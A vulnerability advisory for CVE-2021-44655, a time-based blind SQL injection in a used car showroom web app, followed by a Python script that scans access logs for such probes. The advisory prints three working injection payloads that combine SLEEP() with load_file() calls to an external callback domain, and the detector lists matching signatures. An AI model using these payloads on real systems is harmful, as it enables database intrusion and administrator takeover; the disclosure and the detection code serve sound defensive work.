CVE-2021-44655
Description:
The bid, c and id parameters of the /used_car_showroom/ node app in Online-Pre-owned/Used Car Showroom Management 1.0 appear to be vulnerable to multiple time-based blind SQL injection attacks. The payload '+(select load_file('\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\nxj'))+' was submitted in the bid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path pointing at a host on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. An attacker can take control of the administrator account on this system.
Status: CRITICAL
[+] Payloads:
- Multiple:
bid, c & id
---
Parameter: bid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=product_per_brand&bid=7'+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+'' AND (SELECT 3670 FROM (SELECT(SLEEP(5)))hxug) AND 'ovPl'='ovPl
---
---
Parameter: c (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=categories&c=2'+(select load_file('\\\\xyzk2f5fk3wpwa2tj618b33jbah35vvjmmadx4lt.nu11secur1typenetrationtestingengineers.net\\thk'))+'' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))DuhP) AND 'vkhG'='vkhG
---
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_product&id=3'+(select load_file('\\\\rc7eg9j9yxaja4gnx0f2pxhdp4vxj17sag13srh.nu11secur1typenetrationtestingengineers.net\\deo'))+'' AND (SELECT 8828 FROM (SELECT(SLEEP(3)))VaSc) AND 'gDVf'='gDVf
---
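As an added defender-side example (not part of the advisory or the affected project), the following Python triages web access logs for requests shaped like the payloads above: a quote breaking out of a numeric id, a SLEEP() subquery, and load_file() aimed at a UNC path. The parameter names come from the advisory; the IPs, callback host and log lines are constructed sample data.

```python
import re
from urllib.parse import urlparse, parse_qs

# Parameters the advisory names as injectable on the /used_car_showroom/ app.
WATCHED_PARAMS = {"bid", "c", "id"}

# The advisory's payloads combine three traits; each gets a signature.
SIGNATURES = {
    # time-based blind probe: SLEEP(n) inside a subquery
    "time_based_sleep": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.IGNORECASE),
    # out-of-band probe: load_file() pointed at a UNC path (\\host\share)
    "oob_load_file_unc": re.compile(r"\bLOAD_FILE\s*\(\s*'\\{2,}", re.IGNORECASE),
    # string context broken out of with a quote right after a numeric id
    "quote_break": re.compile(r"^\d+'"),
}

# Common/combined access-log request line: ip ident user [ts] "METHOD URI PROTO"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+"'
)


def analyze_line(line):
    """Return a list of findings for one access-log line (empty when clean)."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    query = urlparse(m.group("uri")).query
    findings = []
    # parse_qs URL-decodes values, so signatures run on what the app would see
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            hits = sorted(sig for sig, rx in SIGNATURES.items() if rx.search(value))
            if hits:
                findings.append({"ip": m.group("ip"), "param": name, "techniques": hits})
    return findings


def analyze_log(text):
    return [f for line in text.splitlines() if line.strip() for f in analyze_line(line)]


# Constructed sample log (not from the page): one benign request and one probe
# shaped like the advisory's bid payload, with the callback host replaced by a placeholder.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2022:10:00:00 +0000] "GET /used_car_showroom/?page=product_per_brand&bid=7 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2022:10:00:05 +0000] "GET /used_car_showroom/?page=product_per_brand&bid=7%27%2B%28select%20load_file%28%27%5C%5C%5C%5Coob.example%5C%5Cnxj%27%29%29%2B%27%27%20AND%20%28SELECT%203670%20FROM%20%28SELECT%28SLEEP%285%29%29%29hxug%29%20AND%20%27ovPl%27%3D%27ovPl HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
```

A response-time field in the log, where available, lets the SLEEP(n) hit be correlated with an n-second response, which is the strongest confirmation that the time-based probe actually executed.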
